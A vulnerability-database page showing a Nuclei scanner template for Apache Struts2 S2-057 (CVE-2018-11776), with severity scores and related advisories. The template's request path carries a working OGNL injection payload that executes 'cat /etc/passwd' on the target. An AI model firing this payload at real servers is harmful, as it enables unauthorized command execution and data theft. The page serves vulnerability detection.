Lucene search
ProjectDiscoveryNUCLEI:CVE-2018-11776HistoryFeb 24, 2021 - 4:29 a.m.
Apache Struts2 S2-057 - Remote Code Execution
2021-02-2404:29:30
ProjectDiscovery
github.com
28
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.
id: CVE-2018-11776
info:
name: Apache Struts2 S2-057 - Remote Code Execution
author: pikpikcu
severity: high
description: |
Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.
impact: |
Remote code execution
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
reference:
- https://github.com/jas502n/St2-057
- https://cwiki.apache.org/confluence/display/WW/S2-057
- https://security.netapp.com/advisory/ntap-20180822-0001/
- https://nvd.nist.gov/vuln/detail/CVE-2018-11776
- http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-11776
cwe-id: CWE-20
epss-score: 0.97517
epss-percentile: 0.99985
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: struts
tags: cve,cve2018,packetstorm,apache,rce,struts,kev
http:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950Related
threatpost
threatpost
On xDedic, a Flash Zero Day, Facial Recognition, and More
2016-06-17 11:15:12
Amazon Web Services Combing Third Parties for Credentials
2014-04-02 15:01:53
DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites
2016-10-21 10:01:14
prion
prion
Remote code execution
2018-08-22 13:29:00
veracode
veracode
Remote Code Execution (RCE)
2018-08-22 17:36:38
nessus
nessus
zdt
zdt
Apache Struts 2.x Remote Code Execution Vulnerability
2018-08-24 00:00:00
ibm
ibm
akamaiblog
akamaiblog
Web Application and API Protection -- From SQL Injection to Magecart
2020-09-09 13:00:00
openvas
openvas
Apache Struts Security Update (S2-057) - Version Check
2018-08-23 00:00:00
Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)
2020-06-05 00:00:00
Apache Struts Security Update (S2-057) - Active Check
2018-08-27 00:00:00
talosblog
talosblog
Connecting the dots between recently active cryptominers
2018-12-18 08:33:00
osv
osv
Apache Struts vulnerable to remote command execution (RCE) due to improper input validation
2018-10-18 19:24:38
CVE-2018-11776
2018-08-22 13:29:00
qualysblog
qualysblog
Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug
2018-08-27 18:32:33
Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776
2018-08-23 20:27:19
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
cisco
cisco
kitploit
kitploit
Mitaka - A Browser Extension For OSINT Search
2019-09-21 12:00:00
Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts
2018-08-26 21:14:00
Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts
2019-05-12 13:09:00
metasploit
metasploit
Apache Struts 2 Namespace Redirect OGNL Injection
2018-08-31 18:48:22
myhack58
myhack58
checkpoint_advisories
checkpoint_advisories
Apache Struts Remote Code Execution (CVE-2018-11776)
2018-08-23 00:00:00
packetstorm
packetstorm
Apache Struts 2.3 / 2.5 Remote Code Execution
2018-08-25 00:00:00
Apache Struts 2.3 / 2.5 Remote Code Execution
2018-08-26 00:00:00
Apache Struts 2 Namespace Redirect OGNL Injection
2018-09-07 00:00:00
f5
f5
K60499474 : Apache Struts vulnerability CVE-2018-11776
2018-08-24 00:00:00
ubuntucve
ubuntucve
CVE-2018-11776
2018-08-22 00:00:00
github
github
Apache Struts vulnerable to remote command execution (RCE) due to improper input validation
2018-10-18 19:24:38
Bypassing OGNL sandboxes for fun and charities
2023-01-27 16:00:49
dsquare
dsquare
Apache Struts 2 Multiple Tags Result Namespace Handling RCE
2018-10-20 00:00:00
exploitpack
exploitpack
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)
2018-08-26 00:00:00
redhatcve
redhatcve
CVE-2018-11776
2018-08-22 08:49:33
attackerkb
attackerkb
trendmicroblog
trendmicroblog
Server Security for the Modern IT Ecosystem
2019-01-03 15:30:46
impervablog
impervablog
Read: Apache Struts Patches ‘Critical Vulnerability’ CVE-2018-11776
2018-08-23 14:25:36
krebs
krebs
Experts Urge Rapid Patching of ‘Struts’ Bug
2018-08-23 20:22:35
cve
cve
CVE-2018-11776
2018-08-22 13:29:00
cisa_kev
cisa_kev
Apache Struts Remote Code Execution Vulnerability
2021-11-03 00:00:00
githubexploit
githubexploit
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
thn
thn
Cisco Issues Security Patch Updates for 32 Flaws in its Products
2018-09-06 08:45:00
New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers
2018-08-22 14:04:00
rapid7blog
rapid7blog
Active Exploitation of Confluence CVE-2022-26134
2022-06-02 23:27:15
fireeye
fireeye
oracle
oracle
Oracle Critical Patch Update Advisory - January 2019
2019-01-15 00:00:00
Oracle Critical Patch Update - October 2018
2018-12-18 00:00:00
Oracle Critical Patch Update Advisory - July 2020
2020-07-14 00:00:00
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
Related for NUCLEI:CVE-2018-11776